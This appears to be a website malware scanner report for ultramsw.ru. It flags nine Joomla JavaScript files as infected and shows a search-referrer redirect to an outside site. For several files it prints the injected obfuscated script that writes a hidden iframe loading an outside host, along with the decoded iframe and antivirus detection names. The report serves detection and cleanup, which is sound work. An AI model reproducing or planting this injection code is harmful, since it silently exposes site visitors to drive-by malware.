New scan:

Malware Scanner report for ultramsw.ru

Malicious/Suspicious/Total urls checked
9/0/15
9 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://decmexico.com/includes/domit/1.php
257 websites infected.

The website "ultramsw.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.ultramsw.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: www.ultramsw.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Cache-Control: max-age=0
Connection: close
Date: Sun, 24 Aug 2014 07:24:18 GMT
Location: http://decmexico.com/includes/domit/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=windows-1251
Expires: Sun, 24 Aug 2014 07:24:18 GMT
malicious

Scanned pages/files

RequestServer responseStatus
http://www.ultramsw.ru/
200 OK
Content-Length: 14613
Content-Type: text/html
clean
http://www.ultramsw.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 67357
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3198 bytes are skipped ...
t.Events[f],d=h,j=this;if(b){if(b.onAdd){b.onAdd.call(this,h,f);
}if(b.condition){d=function(k){if(b.condition.call(this,k,f)){return h.call(this,k);}return true;};}if(b.base){g=Function.from(b.base).call(this,f);}}var e=function(){return h.call(j);
};var c=Element.NativeEvents[g];if(c){if(c==2){e=function(k){k=new DOMEvent(k,j.getWindow());if(d.call(j,k)===false){k.stop();}};}this.addListener(g,e,arguments[2]);
}i[f].values.push(e);return this;},removeEvent:function(e,d){var c=this.

Antivirus reports:

DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI

http://www.ultramsw.ru/media/system/js/core.js
200 OK
Content-Length: 1823
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 892 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://www.ultramsw.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 10013
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 892 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://www.ultramsw.ru/media/system/js/modal.js
200 OK
Content-Length: 10015
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 892 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://www.ultramsw.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 8643
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3404 bytes are skipped ...
nt)
$K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

DrWeb
SCRIPT.Virus

http://www.ultramsw.ru/media/system/js/caption.js
200 OK
Content-Length: 2552
Content-Type: application/javascript
clean
http://www.ultramsw.ru/plugins/content/tooltipgc/assets/tooltipgc.js
200 OK
Content-Length: 1823
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 892 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://www.ultramsw.ru/modules/mod_image_show_gk4/styles/gk_black_and_white/engine.js
200 OK
Content-Length: 13265
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3361 bytes are skipped ...
i){
item.anim_top.set(i%2 == 1 ? -$this[elID].wrap_height : $this[elID].wrap_height);
item.anim_opacity.set(0);
$this[elID].playing = false;
});
}).delay($this[elID].options['anim_speed']);
}
}
},

redirect: function(where, elID) {
window.location = $this[elID].links[where];
}
});
GK_IS_oct2010_12.implement(new Options);

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI

http://www.ultramsw.ru/modules/mod_animateimages/js/jquery-1.4.2.min.js
200 OK
Content-Length: 73997
Content-Type: application/javascript
clean
http://www.ultramsw.ru/templates/ultra/jquery.js
200 OK
Content-Length: 34589
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 3328 bytes are skipped ...
mp;o.remove.call(a,q);if(e!=null)break}}if(p.length===0||e!=null&&p.length===1)(!o.teardown||o.teardown.call(a,m)===!1)&&f.removeEvent(a,h,s.handle),g=null,delete
t[h]}if(f.isEmptyObject(t)){var u=s.handle;u&&(u.elem=null),delete s.events,delete s.handle,f.isEmptyObject(s)&&f.removeData(a,b,!0)}}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){var h=c.type||c,i=[],j;h.indexOf("!")>=0&&(h=h.slice(0,-1),j=!0),h.indexOf(".

Antivirus reports:

DrWeb
JS.IFrame.564
Microsoft
Trojan:JS/Iframe.DI

http://www.ultramsw.ru/templates/ultra/script.js
200 OK
Content-Length: 10013
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ddd_prover_ua(){
var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox
... 892 bytes are skipped ...
decodeURIComponent(matches[1]) : undefined;
}
if (!ddd_prover_ua()) {
var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la');
if (cookie == undefined) {
setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401);
document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>');
}
}
})();

Decoded script:


<iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://www.ultramsw.ru/collection/all-collections.html
200 OK
Content-Length: 23607
Content-Type: text/html
clean
http://www.ultramsw.ru/collection/jacquards-prints.html
200 OK
Content-Length: 32899
Content-Type: text/html
clean
http://www.ultramsw.ru/collection/chenilles-textures.html
200 OK
Content-Length: 22626
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ultramsw.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ultramsw.ru/

Result: ultramsw.ru is not infected or malware details are not published yet.